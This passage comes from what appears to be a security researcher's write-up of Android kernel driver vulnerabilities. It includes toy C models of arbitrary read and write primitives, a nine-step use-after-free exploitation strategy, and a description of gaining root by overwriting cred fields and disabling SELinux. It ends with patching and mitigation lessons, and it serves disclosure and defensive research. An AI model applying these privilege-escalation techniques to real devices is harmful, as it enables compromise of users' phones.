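A userspace model of that read may help. In this sketch the layout of toy_file, and therefore the offset of f_count, is invented for illustration; on a real target the offset depends on the kernel build. The fake dma_buf stores its file pointer as an integer so that the model can subtract the offset without relying on out-of-bounds pointer arithmetic.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical layout: only the position of f_count matters here. */
struct toy_file {
        char pad[56];
        long f_count;
};

/* The fake dma_buf lives in attacker-controlled memory. */
struct toy_dma_buf {
        uintptr_t file;
};

/* Models file_count(): load f_count relative to the file pointer. */
long toy_file_count(uintptr_t file)
{
        long v;

        memcpy(&v, (const void *)(file + offsetof(struct toy_file, f_count)),
               sizeof(v));
        return v;
}

/* Models the value printed on the "count:" line of fdinfo. */
long toy_fdinfo_count(const struct toy_dma_buf *dmabuf)
{
        return (long)((unsigned long)toy_file_count(dmabuf->file) - 1UL);
}

/* Attacker side: aim the file pointer so that f_count overlaps the
 * target, then undo the "- 1" applied before printing. */
long arb_read_long(struct toy_dma_buf *fake, const void *target)
{
        fake->file = (uintptr_t)target - offsetof(struct toy_file, f_count);
        return (long)((unsigned long)toy_fdinfo_count(fake) + 1UL);
}
```

Each read costs one rewrite of the fake struct and one read of the fdinfo entry, and returns one long-sized value from the chosen address.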

Achieving arbitrary write

At this point we have three powerful primitives:

  • Read/write UAF’d dma_buf struct memory (via GED GE buffers)
  • Arbitrary read (via dma_buf_show_fdinfo)
  • Arbitrary free (via ged_dmabuf_set_name)

Graph showing our arbitrary read and arbitrary free primitives via the UAF'd dma buffer

There are many potential strategies that use these primitives to achieve an arbitrary write primitive. The technique I chose was to type-confuse a GE buffer with a GE buffer array. GED GE Buffers are tracked through a hierarchy of structs and arrays. A GE file’s private_data member points to an array of GE buffer pointers like so:

Graph showing the object hierarchy of GE files within an fdtable down to GE buffers

I achieve this type-confusion by using the arbitrary-free primitive developed previously to free a GE buffer array, then reclaiming that array with a GE buffer from a second GE file. Since the GE buffer array (and GE buffers as well) come from generic kmalloc caches, the only requirement for this reclamation is allocating GE buffers that are the same size as a GE buffer array. If two GE files are referencing the same memory, one (GE file A) as a GE buffer, and one (GE file B) as a GE buffer array, I can modify the contents of a GE buffer array at will.

Graph showing the overlapping object hierarchy of two GE files where one file's GE buffer is another file's GE buffer array

Then performing an arbitrary write to a virtual address X will be as simple as using GE file A’s GE buffer to change the contents of the array to point to the virtual address X, then writing to that address using GE file B which now thinks virtual address X is a GE buffer!
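The overlap can be modeled with a union that lets one chunk of memory be viewed both ways. This is a sketch only: the element type of a GE buffer, the slot count, and the two file_ accessors are assumptions made for illustration, not the GED driver's interface.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TOY_SLOTS 4

/* One chunk of memory that two GE files interpret differently. */
union toy_chunk {
        uint32_t *as_array[TOY_SLOTS];   /* file B: array of buffer pointers */
        unsigned char as_buffer[TOY_SLOTS * sizeof(uint32_t *)]; /* file A: bytes */
};

/* File A: an ordinary bounds-checked write into its own buffer. */
void file_a_write(union toy_chunk *c, size_t off, const void *src, size_t len)
{
        assert(off <= sizeof(c->as_buffer) && len <= sizeof(c->as_buffer) - off);
        memcpy(c->as_buffer + off, src, len);
}

/* File B: write one entry into the buffer that array slot idx points to. */
void file_b_write(union toy_chunk *c, size_t idx, uint32_t value)
{
        assert(idx < TOY_SLOTS);
        *c->as_array[idx] = value;
}

/* Combine the two views: retarget slot 0, then write through it. */
void arb_write32(union toy_chunk *c, uint32_t *target, uint32_t value)
{
        file_a_write(c, 0, &target, sizeof(target));
        file_b_write(c, 0, value);
}
```

Neither accessor does anything unusual on its own; the write primitive exists only because both refer to the same memory.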

This technique hinges on being able to use the arbitrary free primitive to free a GE buffer array. To do that, it’s necessary to find the virtual address of a GE buffer array first. Since we have an arbitrary read primitive already, any parent struct/object/array of a GE buffer array will be enough to find the virtual address of a GE buffer array itself. The hierarchy is as follows:

  1. GE arrays are referenced by a GE file
  2. GE files are referenced by an fdtable as a file descriptor
  3. An fdtable is referenced by a task struct
  4. Task structs are referenced as part of the task list with the root node being the init task in the kernel image
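For illustration, walking that hierarchy from the top with an arbitrary read could look like the sketch below. It is not the route the exploit takes, and the structures are toy versions: real kernels link tasks through an embedded list head and reach the fdtable through an intermediate struct, and every offset differs per build. arb_read_ptr and arb_read_int stand in for the read primitive; all names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy layouts that follow the four-level hierarchy listed above. */
struct toy_ge_file { void *private_data; };          /* -> GE buffer array */
struct toy_fdtable { struct toy_ge_file **fd; };     /* fd number -> file */
struct toy_task {
        struct toy_task *next;                       /* circular task list */
        int pid;
        struct toy_fdtable *fdt;
};

/* Stand-ins for the arbitrary read primitive. */
uintptr_t arb_read_ptr(uintptr_t addr)
{
        uintptr_t v;

        memcpy(&v, (const void *)addr, sizeof(v));
        return v;
}

int arb_read_int(uintptr_t addr)
{
        int v;

        memcpy(&v, (const void *)addr, sizeof(v));
        return v;
}

/* Walk tasks from init until `pid` is found, then follow
 * task -> fdtable -> file -> private_data. Returns 0 if not found. */
uintptr_t find_ge_array(uintptr_t init_task, int pid, int ge_fd)
{
        uintptr_t task = init_task;

        do {
                if (arb_read_int(task + offsetof(struct toy_task, pid)) == pid) {
                        uintptr_t fdt = arb_read_ptr(task + offsetof(struct toy_task, fdt));
                        uintptr_t fds = arb_read_ptr(fdt + offsetof(struct toy_fdtable, fd));
                        uintptr_t file = arb_read_ptr(fds + (uintptr_t)ge_fd * sizeof(void *));

                        return arb_read_ptr(file + offsetof(struct toy_ge_file, private_data));
                }
                task = arb_read_ptr(task + offsetof(struct toy_task, next));
        } while (task != 0 && task != init_task);

        return 0;
}
```

Any level of the chain is a valid starting point, which is why locating just one parent object is enough.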

The fdtable represents an attractive object to find, as it comes out of the same generic kmalloc cache as dma_buf name strings. We can find a dma_buf name string’s virtual address by using dma_buf_set_name (which we also use as our arbitrary free primitive) to insert a pointer to a dma_buf name string into the reclaimed UAF’d dma_buf object that is now a GE buffer. We then simply read it out of our GE buffer, free that dma_buf name string (again using dma_buf_set_name), and reclaim it with an fdtable. Creating fdtables is fairly easy - we simply fork many processes ahead of time that share an fdtable, then unshare(2) the fdtable at the appropriate time to allocate new fdtables. The full exploit strategy is as follows:

  1. Trigger a dangling fd of a dmabuf file using our mtk-jpeg race condition bug
  2. Reclaim the underlying dma_buf leaving the parent dmabuf file free (but still referenced by a dangling file descriptor)
  3. Use ged_dmabuf_set_name on our dangling file to place a new name pointer in the fake dma_buf struct
  4. Read the fake dma_buf struct (which is really a GE buffer) to get the name pointer
  5. Free the name pointer by calling ged_dmabuf_set_name again
  6. Reclaim the name pointer as an fdtable with references to a GE fd with an array of GE buffers
  7. Use the arbitrary read to find the GE buffer array
  8. Use the arbitrary free to free the GE buffer array
  9. Reclaim the GE buffer array with another GE buffer

At the end of this process we’ll have a reliable arbitrary read/write!

Getting a root shell

As a fun exercise, I decided to see how easy it was to disable SELinux and get root after achieving arbitrary read/write. Various manufacturers may implement certain tripping hazards to slow down exploit development efforts, but in my case (Asus ROG 6D), there were no hoops I needed to jump through at all. It was enough to simply write 0 to the uid/gid of my process’s cred struct to achieve root, and write 0 to the selinux_enforcing bit to turn off SELinux. After this I just execlp("/system/bin/sh",...) and out pops a root shell!

Getting root on an Android device with the exploit

Conclusion

I discovered significant security vulnerabilities across all 3 of the evaluated devices. It is highly likely that reviewing more devices comprising a greater spread of chipset manufacturers would lead to the discovery of additional vulnerabilities. Android regularly uses higher-privileged processes to liaise between applications and kernel drivers, meaning that most kernel drivers cannot be seen from an unprivileged app context (the GPU being the most obvious exception to this rule). Nevertheless, a determined attacker could use vulnerabilities in other more privileged processes to pivot into contexts from which the attack surface of these kernel drivers becomes reachable. This pivot strategy could widen the attack surface beyond the scope of this research.

As it becomes more difficult to find 0-days in core Android, third-party Linux kernel drivers are becoming increasingly attractive targets for attackers. While the bulk of present-day detected ITW Android exploitation targets GPU drivers, it’s equally important that other third-party drivers are held to the same security standards.

There is room for improvement in the patching process across all 3 of the bugs discovered. None of the patches for these bugs met Project Zero's 90-day deadline for patches reaching end-users. This appears to largely be a result of the propagation delay from when third-party driver developers issue patches to when downstream manufacturers can incorporate those patches into Android security updates. Shortening this propagation delay (e.g. using Android APEX to ship updated kernel drivers) would go a long way to minimizing the Android driver patch gap. In addition, one of these bugs was only partially patched and remained exploitable on some devices for an additional 2 years before the security impact of the bug was assessed and publicly reported. Developers should regularly consider the security impacts of bugs, especially those reported by static analysis tools designed to detect security-relevant issues.

Finally, while cross-cache heap shaping mitigations significantly impede exploit development strategies, they don’t entirely prevent a determined attacker from exploiting kernel UAF vulnerabilities, even if the UAF’d object comes out of a dedicated slab cache. In this particular case, second-order allocations in a UAF’d object lead to powerful and exploitable primitives. Developers may be able to mitigate this technique by setting pointers to NULL, even if the parent object is about to get freed anyway. However, this exploit technique demonstrates that even well-designed mitigations (such as SLAB_VIRTUAL) come with limitations in an era where an attacker can achieve undetected memory corruption. It will take more fundamental mitigations that address the root issue of memory corruption, like MTE, in order to dramatically raise the bar for attackers.

Resources

This research was presented at ShmooCon. A video is available here: https://archive.org/details/shmoocon2024/Shmoocon2024-SethJenkins-Driving_Forward_in_Android_Drivers.mp4

The proof of concept exploit code developed and presented in this research is available at:

https://bugs.chromium.org/p/project-zero/issues/detail?id=2470#c4
